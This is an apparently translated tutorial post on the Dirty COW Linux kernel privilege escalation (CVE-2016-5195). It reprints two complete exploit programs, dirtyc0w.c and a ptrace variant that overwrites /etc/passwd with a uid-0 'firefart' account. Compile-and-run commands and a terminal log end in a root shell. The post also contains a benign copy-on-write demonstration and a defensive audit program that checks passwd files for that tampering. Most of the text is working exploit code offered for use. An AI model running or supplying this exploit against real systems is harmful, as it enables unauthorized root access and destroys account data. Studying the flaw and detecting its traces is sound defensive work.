CVE-2016-5195 Dirtycow: Linux kernel privilege escalation vulnerability
This article introduces the Linux operations topic CVE-2016-5195 Dirtycow, a Linux kernel privilege escalation vulnerability, through concrete material, in the hope that it helps readers learning Linux operations.
All of the source below was found on GitHub and was tested successfully on ubuntu-12.04.5-desktop-i386.
First, run the following to confirm that the vulnerability is present:
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
If the last value is output like this, the vulnerability exists (two of the commands above are run as root).
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;

void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {
    /*
    You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
    > This is achieved by racing the madvise(MADV_DONTNEED) system call
    > while having the page of the executable mmapped in memory.
    */
    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
  return NULL;
}

void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;
  /*
  You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
  > The in the wild exploit we are aware of doesn't work on Red Hat
  > Enterprise Linux 5 and 6 out of the box because on one side of
  > the race it writes to /proc/self/mem, but /proc/self/mem is not
  > writable on Red Hat Enterprise Linux 5 and 6.
  */
  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {
    /*
    You have to reset the file pointer to the memory position.
    */
    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
  return NULL;
}

int main(int argc,char *argv[])
{
  /*
  You have to pass two arguments. File and Contents.
  */
  if (argc<3) {
    (void)fprintf(stderr, "%s\n",
                  "usage: dirtyc0w target_file new_content");
    return 1; }
  pthread_t pth1,pth2;
  /*
  You have to open the file in read only mode.
  */
  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];
  /*
  You have to use MAP_PRIVATE for copy-on-write mapping.
  > Create a private copy-on-write mapping. Updates to the
  > mapping are not visible to other processes mapping the same
  > file, and are not carried through to the underlying file. It
  > is unspecified whether changes made to the file after the
  > mmap() call are visible in the mapped region.
  */
  /*
  You have to open with PROT_READ.
  */
  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);
  /*
  You have to do it on two threads.
  */
  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);
  /*
  You have to wait for the threads to finish.
  */
  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}
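As an added example (not code from the original post or from the dirtycow project), the program below shows, without any race, the two documented behaviours the PoC above relies on: a write to a MAP_PRIVATE mapping is never carried through to the file, and madvise(MADV_DONTNEED) throws the private copy away so the mapping falls back to the file's bytes. It uses a constructed temporary file under /tmp; the file content and the helper name cow_demo are assumptions.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Constructed file content, modelled on the post's "foo" (not from the page).
static const char ORIGINAL[] = "this is not a test\n";
static const char NEW[] = "m00000000000000000";

// Returns 0 when MAP_PRIVATE and MADV_DONTNEED behave as documented,
// otherwise the number of the first check that failed.
int cow_demo(void) {
  char path[] = "/tmp/cowdemoXXXXXX";          // assumed writable location
  int fd = mkstemp(path);
  if (fd < 0) return 1;
  unlink(path);                                // file lives only as long as fd
  size_t len = sizeof(ORIGINAL) - 1;
  if (write(fd, ORIGINAL, len) != (ssize_t)len) { close(fd); return 2; }

  // A private, writable mapping: the first write triggers copy-on-write and
  // from then on this process sees its own anonymous copy of the page.
  char *map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (map == MAP_FAILED) { close(fd); return 3; }
  memcpy(map, NEW, sizeof(NEW) - 1);
  if (memcmp(map, NEW, sizeof(NEW) - 1) != 0) return 4;

  // The file itself is not changed by the write to the private copy.
  char buf[64] = {0};
  if (pread(fd, buf, len, 0) != (ssize_t)len) return 5;
  if (memcmp(buf, ORIGINAL, len) != 0) return 6;

  // MADV_DONTNEED discards the private copy; the next access faults the page
  // back in from the file, so the mapping shows the original bytes again.
  // Discarding the copy is the step the PoC above races against a write.
  if (madvise(map, len, MADV_DONTNEED) != 0) return 7;
  if (memcmp(map, ORIGINAL, len) != 0) return 8;

  munmap(map, len);
  close(fd);
  return 0;
}

int main(void) {
  int rc = cow_demo();
  printf("cow_demo: %s (rc=%d)\n", rc == 0 ? "behaves as documented" : "unexpected", rc);
  return rc;
}
```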
Exploit source:
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly created binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
// $ gcc -pthread dirty.c -o dirty -lcrypt
// $ ./dirty test          (test is the password)
// $ su firefart           (then enter the password test)
// After an ordinary user runs the commands above, the firefart user becomes root and the original root account no longer exists.
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
#include <signal.h>   /* kill() and SIGSTOP */

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
  char *username;
  char *hash;
  int user_id;
  int group_id;
  char *info;
  char *home_dir;
  char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
  return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
  const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  int size = snprintf(NULL, 0, format, u.username, u.hash,
    u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  char *ret = malloc(size + 1);
  sprintf(ret, format, u.username, u.hash, u.user_id,
    u.group_id, u.info, u.home_dir, u.shell);
  return ret;
}

void *madviseThread(void *arg) {
  int i, c = 0;
  // loop bound restored from the referenced upstream dirty.c (lost in this copy)
  for(i = 0; i < 200000000; i++) {
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
  return NULL;
}

int copy_file(const char *from, const char *to) {
  // check if target file already exists
  if(access(to, F_OK) != -1) {
    printf("File %s already exists! Please delete it and run again\n",
      to);
    return -1;
  }
  int ch;   // int, not char, so that EOF is detected reliably
  FILE *source, *target;
  source = fopen(from, "r");
  if(source == NULL) {
    return -1;
  }
  target = fopen(to, "w");
  if(target == NULL) {
    fclose(source);
    return -1;
  }
  while((ch = fgetc(source)) != EOF) {
    fputc(ch, target);
  }
  printf("%s successfully backed up to %s\n",
    from, to);
  fclose(source);
  fclose(target);
  return 0;
}

int main(int argc, char *argv[])
{
  // backup file
  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }
  struct Userinfo user;
  // set values, change as needed
  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";
  char *plaintext_pw;
  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }
  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);
  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(NULL,
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, NULL, 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    // loop bounds restored from the referenced upstream dirty.c (lost in this copy)
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   NULL,
                   madviseThread,
                   NULL);
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,NULL);
  }
  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
  printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}
Run results:
1. Whether the vulnerability exists:
jin@jin:/home/poc/dirty$ ls
dirty.c dirtyc0w.c
jin@jin:/home/poc/dirty$ sudo -s
[sudo] password for jin:
root@jin:/home/poc/dirty# echo this is not a test > foo
root@jin:/home/poc/dirty# chmod 0404 foo
root@jin:/home/poc/dirty# gcc -pthread dirtyc0w.c -o dirtyc0w
root@jin:/home/poc/dirty# ./dirtyc0w foo m00000000000000000
mmap b7741000
madvise 0
procselfmem 1800000000
root@jin:/home/poc/dirty# cat foo
m00000000000000000
2. Exploitation:
root@jin:/home/poc/dirty# su jin
jin@jin:/home/poc/dirty$ gcc -pthread dirty.c -o dirty -lcrypt
jin@jin:/home/poc/dirty$ ./dirty test
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: test
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
mmap: b77b8000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart‘ and the password ‘test‘.
DON‘T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart‘ and the password ‘test‘.
DON‘T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
jin@jin:/home/poc/dirty$ su
Password:
su: Authentication failure
jin@jin:/home/poc/dirty$ sudo su
sudo: unknown user: root
sudo: unable to initialize policy plugin
jin@jin:/home/poc/dirty$ su firefart
Password:
firefart@jin:/home/poc/dirty# id
uid=0(firefart) gid=0(root) groups=0(root)
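From the defender's side, as an added example that is not part of the original post: a small audit of passwd-format text for the traces the run above leaves behind, namely a uid-0 entry that is not named root and a missing root entry. The sample input is constructed after the post's output (the hash is copied from it); the struct and function names are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// What a defender looks for after this exploit: a uid-0 account that is
// not "root" (the generated line) and the "root" entry itself being gone.
struct PasswdAudit {
  int uid0_entries;   // lines whose uid field is 0
  int foreign_uid0;   // uid-0 lines not named "root"
  int root_present;   // 1 if a line named "root" still exists
};

// Scans passwd-format text (name:hash:uid:gid:gecos:home:shell per line).
struct PasswdAudit audit_passwd(const char *text) {
  struct PasswdAudit r = {0, 0, 0};
  const char *line = text;
  while (*line) {
    const char *nl = strchr(line, '\n');
    size_t len = nl ? (size_t)(nl - line) : strlen(line);
    const char *c1 = memchr(line, ':', len);                 // end of name field
    const char *c2 = c1 ? memchr(c1 + 1, ':', len - (size_t)(c1 + 1 - line)) : NULL;
    if (c1 && c2) {                                          // c2 + 1 starts the uid field
      int is_root = (c1 - line) == 4 && memcmp(line, "root", 4) == 0;
      char *end;
      long uid = strtol(c2 + 1, &end, 10);
      int uid_ok = end != c2 + 1 && *end == ':';             // uid must end at ':'
      if (is_root) r.root_present = 1;
      if (uid_ok && uid == 0) {
        r.uid0_entries++;
        if (!is_root) r.foreign_uid0++;
      }
    }
    line = nl ? nl + 1 : line + len;
  }
  return r;
}

// Constructed sample modelled on the post's run: the root line has been
// replaced by the generated "firefart" line.
static const char SAMPLE_PASSWD[] =
  "firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash\n"
  "daemon:x:1:1:daemon:/usr/sbin:/bin/sh\n"
  "jin:x:1000:1000:jin,,,:/home/jin:/bin/bash\n";

int main(void) {
  struct PasswdAudit a = audit_passwd(SAMPLE_PASSWD);
  printf("uid0=%d foreign_uid0=%d root_present=%d\n",
         a.uid0_entries, a.foreign_uid0, a.root_present);
  return (a.foreign_uid0 || !a.root_present) ? 1 : 0;     // nonzero: tampering suspected
}
```

On a live system the same check would be run over the contents of /etc/passwd, and the exploit's own backup file /tmp/passwd.bak is a second artifact worth looking for.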